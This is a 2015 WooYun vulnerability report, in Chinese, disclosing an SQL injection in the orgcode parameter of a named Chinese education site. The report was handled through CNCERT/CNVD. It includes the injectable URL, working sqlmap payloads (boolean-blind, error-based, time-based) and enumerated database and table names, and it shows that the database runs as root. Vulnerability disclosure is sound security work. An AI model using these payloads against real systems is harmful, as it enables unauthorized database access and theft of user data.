当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-094808

漏洞标题:中央某教学系统某站点SQL注入

相关厂商:cncert国家互联网应急中心

漏洞作者: ki11y0u

提交时间:2015-02-02 10:43

修复时间:2015-03-19 10:44

公开时间:2015-03-19 10:44

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-02-02: 细节已通知厂商并且等待厂商处理中
2015-02-06: 厂商已经确认,细节仅向厂商公开
2015-02-16: 细节向核心白帽子及相关领域专家公开
2015-02-26: 细节向普通白帽子公开
2015-03-08: 细节向实习白帽子公开
2015-03-19: 细节向公众公开

简要描述:

快升级了,好鸡冻。

详细说明:

中央电化教育馆教育教学综合应用系统,下网络空间站点:http://rrt.cer.com.cn/
存在注入:http://rrt.cer.com.cn/schoolspace.php?orgcode=0000000000'
报错信息:

a.jpg


Sqlmap:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: orgcode
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: orgcode=0000000000' RLIKE (SELECT (CASE WHEN (1188=1188) THEN 0000000000 ELSE 0x28 END)) AND 'GKjO'='GKjO
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: orgcode=0000000000' AND (SELECT 9207 FROM(SELECT COUNT(*),CONCAT(0x7173757871,(SELECT (CASE WHEN (9207=9207) THEN 1 ELSE 0 END)),0x7161706271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'NKxj'='NKxj
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 OR time-based blind
Payload: orgcode=-9235' OR 9918=SLEEP(5) AND 'JlZF'='JlZF
---
web application technology: Apache 2.4.9, PHP 5.5.12
back-end DBMS: MySQL >= 5.0.0
current user: 'root@%'
current database: 'rrt_home'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---


所有数据库:

web application technology: Apache 2.4.9, PHP 5.5.12
back-end DBMS: MySQL >= 5.0.0
available databases [27]:
[*] content_editor
[*] hxdp
[*] information_schema
[*] jse_app
[*] jse_ask
[*] jse_base
[*] jse_cardsum
[*] jse_chelp
[*] jse_cms
[*] jse_contents
[*] jse_module
[*] jse_pay
[*] jse_platform
[*] jse_record
[*] jse_resources
[*] jse_school
[*] jse_school_room
[*] jse_second
[*] jse_shorturl
[*] jse_storage
[*] jse_usercenter
[*] mysql
[*] performance_schema
[*] rrt_center
[*] rrt_home
[*] sitecounter
[*] test


表:

web application technology: Apache 2.4.9, PHP 5.5.12
back-end DBMS: MySQL >= 5.0.0
Database: rrt_home
[152 tables]
+-----------------------------------+
| uchome_activity |
| uchome_activity_log |
| uchome_ad |
| uchome_adminsession |
| uchome_album |
| uchome_announcement |
| uchome_api_cache |
| uchome_app |
| uchome_appcreditlog |
| uchome_apply |
| uchome_applycourse |
| uchome_applyrules |
| uchome_apptype |
| uchome_attachment |
| uchome_blacklist |
| uchome_block |
| uchome_blog |
| uchome_blogfield |
| uchome_bureau_info |
| uchome_cache |
| uchome_class |
| uchome_class_info |
| uchome_class_msg |
| uchome_classmeta |
| uchome_click |
| uchome_clickuser |
| uchome_college_info |
| uchome_comment |
| uchome_config |
| uchome_course |
| uchome_creditlog |
| uchome_creditrule |
| uchome_cron |
| uchome_data |
| uchome_docomment |
| uchome_doing |
| uchome_download_resource |
| uchome_event |
| uchome_eventclass |
| uchome_eventfield |
| uchome_eventinvite |
| uchome_eventpic |
| uchome_feed |
| uchome_feed_school |
| uchome_friend |
| uchome_friendgroup |
| uchome_friendguide |
| uchome_friendlog |
| uchome_invite |
| uchome_log |
| uchome_magic |
| uchome_magicinlog |
| uchome_magicstore |
| uchome_magicuselog |
| uchome_mailcron |
| uchome_mailqueue |
| uchome_member |
| uchome_moudle_to_system |
| uchome_moudle_to_user |
| uchome_mtag |
| uchome_mtaginvite |
| uchome_myapp |
| uchome_myinvite |
| uchome_notification |
| uchome_photo_ad |
| uchome_pic |
| uchome_picfield |
| uchome_poke |
| uchome_poll |
| uchome_pollfield |
| uchome_polloption |
| uchome_polluser |
| uchome_post |
| uchome_post_add_paper |
| uchome_post_answer |
| uchome_post_make_lesson |
| uchome_post_mark_exam |
| uchome_post_paper_marked |
| uchome_post_question |
| uchome_post_teach_arrange |
| uchome_powerful_usermoudles |
| uchome_powerful_usermoudles_cache |
| uchome_powerful_usermoudles_par |
| uchome_powerful_usermoudles_val |
| uchome_profield |
| uchome_profilefield |
| uchome_recommend |
| uchome_report |
| uchome_resource |
| uchome_resource_back_delete |
| uchome_rules |
| uchome_school_info |
| uchome_school_stepage |
| uchome_scrollimage |
| uchome_session |
| uchome_share |
| uchome_show |
| uchome_space |
| uchome_space_t |
| uchome_space_title |
| uchome_spacefield |
| uchome_spaceinfo |
| uchome_spacelog |
| uchome_specialty |
| uchome_sq_activity |
| uchome_sq_activity_experience |
| uchome_sq_activity_member |
| uchome_sq_activity_stage |
| uchome_sq_album |
| uchome_sq_announcement |
| uchome_sq_announcement_att |
| uchome_sq_attachment |
| uchome_sq_class |
| uchome_sq_community |
| uchome_sq_community_member |
| uchome_sq_feed |
| uchome_sq_moudle |
| uchome_sq_moudle_to_space |
| uchome_sq_pic |
| uchome_sq_poll |
| uchome_sq_resource |
| uchome_sq_share |
| uchome_sq_space_info |
| uchome_sq_space_stepage |
| uchome_sq_spacedefined_moudles |
| uchome_sq_topimages |
| uchome_sq_visitor |
| uchome_stat |
| uchome_statuser |
| uchome_tag |
| uchome_tagblog |
| uchome_tagspace |
| uchome_task |
| uchome_teach |
| uchome_test |
| uchome_thread |
| uchome_topic |
| uchome_topicuser |
| uchome_topimages |
| uchome_urecommend |
| uchome_user_class |
| uchome_user_spec |
| uchome_userapp |
| uchome_userappfield |
| uchome_userdefined_moudles |
| uchome_userevent |
| uchome_usergroup |
| uchome_userlog |
| uchome_usermagic |
| uchome_users_setpage |
| uchome_usertask |
| uchome_visitor |
+-----------------------------------+


未做过多操作。

漏洞证明:

如上。

修复方案:

过滤过滤。

版权声明:转载请注明来源 ki11y0u@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-02-06 09:51

厂商回复:

CNVD确认并复现所述情况,已经由CNVD通过网站公开联系方式(或以往建立的处置渠道)向网站管理单位(软件生产厂商)通报。

最新状态:

暂无


漏洞评价:

评论